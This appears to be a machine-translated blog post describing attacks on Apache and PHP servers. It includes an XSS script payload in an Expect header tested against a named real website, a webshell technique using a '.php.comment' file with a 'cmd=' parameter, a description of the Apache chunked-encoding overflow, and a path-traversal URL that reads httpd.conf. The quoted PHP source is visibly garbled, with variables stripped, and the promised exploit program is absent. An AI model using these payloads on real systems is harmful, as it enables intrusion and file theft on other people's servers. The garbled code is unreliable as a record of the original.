Web security practices (9) attack apache

Web security practices (9) attack apache

The vulnerabilities provided this time have been accumulated at ordinary times, but I have only a few actual vulnerabilities, with limited time and energy. I hope you can provide and discuss more technical issues.

Body

9.1Expect cross-site Vulnerability

Apache will directly output the error message of the header when receiving the HTTP header, and the content of the error message is not escaped. This vulnerability was supposed to disappear with the upgrade of apathe. However, I found many php servers on the Internet and found that there were still some problems.

Perform a simple test on the website http://safesurf.china.cn/data_form.php. Send the following request:

Get_form.php HTTP/1.1

Host: safesurf.china.cn

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv: 1.9.0.3) Gecko/2008092417 Firefox/3.0.3

Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

Accept-Charset: gb2312, UTF-8; q = 0.7, *; q = 0.7

Keep-Alive: 300

Connection: keep-alive

CT: abcd

I added a response CT: abcd request at the end. The result is as follows:

 

HTTP/1.x 417 Expectation Failed

Date: Wed, 12 Nov 2008 01:46:21 GMT

Server: Apache/1.3.29 (Unix) PHP/4.3.4

Keep-Alive: timeout = 15, max = 100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html; charset = iso-8859-1

 

 

We can see that "wrong CT: abcd" in the error message is the request we submitted. At this time, we should consider whether there is a cross-site vulnerability and continue testing.

Send the request (note the final round CT request ):

Get_form.php HTTP/1.1

Host: safesurf.china.cn

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv: 1.9.0.3) Gecko/2008092417 Firefox/3.0.3

Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

Accept-Charset: gb2312, UTF-8; q = 0.7, *; q = 0.7

Keep-Alive: 300

Connection: keep-alive

Secondary CT: <script language = "javascript"> alert ('hello') </script>

Response:

HTTP/1.x 417 Expectation Failed

Date: Wed, 12 Nov 2008 01:53:34 GMT

Server: Apache/1.3.29 (Unix) PHP/4.3.4

Keep-Alive: timeout = 15, max = 100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html; charset = iso-8859-1

 

 

This proves that the server has a Cross-Site vulnerability. We will discuss cross-site attacks in the future. I am not sure whether it is appropriate to expose the specific website?

9.2php File Name Parsing Vulnerability

File names starting with. php, such as index. php. en and index. php. fr, can be parsed as PHP. This is an old vulnerability. I will explain it in an article on the Internet.

 

"Mg 2 is a popular PHP + HTML image management program in foreign countries. Due to the commercial version being cracked, the program has been widely spread,
Search for the keyword "owered by zrv0.5.1" on google"
The latest version has the file Write vulnerability, which can be configured with the Apache vulnerability directly by using shell.

The addcomment () function in includes/maid is as follows:
F

unction addcomment() {REQUEST[′filename′]=this->charfix(REQUEST[′filename′]);_REQUEST['input'] = this−>charfix(_REQUEST['input']);REQUEST[′email′]=this->charfix(REQUEST[′email′]);_REQUEST['name'] = this−>charfix(_REQUEST['name']);REQUEST[′input′]=striptags(_REQUEST['input'], "");REQUEST[′input′]=strreplace("\n","",_REQUEST['input']);REQUEST[′input′]=strreplace("\r","",_REQUEST['input']);if (_REQUEST['input'] != "" &&_REQUEST['name'] != "" && _REQUEST['email'] != "") {this->readcomments("pictures/" . REQUEST[′filename′].".comment");comment_exists = this−>select(_REQUEST['input'],this−>comments,3,1,0);comment_exists = this−>select(_REQUEST['name'],commentexists,1,1,0);comment_exists = this−>select(_REQUEST['email'],commentexists,2,1,0);if(count(comment_exists) == 0) {this−>comments[]=array(time(),_REQUEST['name'], REQUEST[′email′],_REQUEST['input']);this−>writecomments(_REQUEST['filename'] . ".comment");........

The vulnerability is obvious. You can customize the comment file name. If your custom filename is ". php", the program will
The image root directory generates a ". php. comment" file. Due to Apache vulnerabilities, this program is parsed as a php file, and webshell is ready,
Write a exploitation program as follows:

After submission, a file ". php. comment" containing a trojan is generated under the root directory of the image"
Http: // localhost/mg/pictures/. php. comment? Cmd = phpinfo ();"

 

9.3 chunked remote code Overflow Vulnerability

This is a vulnerability that occurred around years ago, but it still seems that this vulnerability still exists and harms many websites.

Apache has a design vulnerability in processing HTTP requests that transmit data in chunked mode, remote attackers may exploit this vulnerability to execute arbitrary commands or perform DoS attacks on some Apache servers with the permissions of Web server processes.
Chunked encoding transmission is a method defined in HTTP 1.1 for Web users to submit data to the server, when the server receives chunked encoding data, it will allocate a buffer to store it. If the submitted data size is unknown, the client will submit the data to the server with a negotiated block size.
The Apache server also supports chunked encoding by default. Apache uses a signed variable to store the part length, and allocates a fixed-size stack buffer to store the part data. For security reasons, Apache checks the block length before copying the block data to the buffer zone. If the block length is greater than the buffer length, Apache copies the data of the buffer length at most, otherwise, data is copied Based on the part length. However, during the above checks, the part length is not converted to the unsigned type for comparison. Because of this, if an attacker sets the part length to a negative value, the above security check will be bypassed, apache will copy a piece of data that is too long (at least> 0x80000000 bytes) to the slow-forward zone, which will cause a buffer overflow.
For Apache 2.0 to 2.0.36 (including 2.0.36), although the same problematic code exists, it detects the conditions for the error and causes the sub-process to exit.

Depending on different factors, including the impact of the thread mode supported by the affected system, this vulnerability can cause Apache Web servers running in various operating systems to reject services.

 

 

The Retina Apache Chunked vulnerability is an Apache block encoding buffer overflow vulnerability scanning software developed by eEye. It can scan 254 IP addresses at The same time. If it finds a vulnerable IP address, the system administrator can fix the vulnerability by double-clicking the IP address ..

You can also find the overflow program and source code about this vulnerability on the Internet, and search for "Apache Exploit" in Google for more information. With these two things, the problem is much simpler.

In addition, it should be noted that if we do not select "show only... "If that option is selected, the software will tell us all the web server types in the CIDR block.

9.3 Php 3 File leakage Vulnerability

It is found that a security vulnerability exists in the Apache Web Server using the PHP3 script.
By sending a specified URL through php, a user can obtain the read permission for a known object on the target machine. Successful exploitation of this vulnerability may cause leakage of sensitive information and facilitate further attacks.
Example: (Windows 2000 + Apache 1.3.6 + PHP3)
Provide the following urls:
Http: // taget/index. php3. % 5c.../.. % 5 cconf/httpd. conf
You can view the httpd. conf file.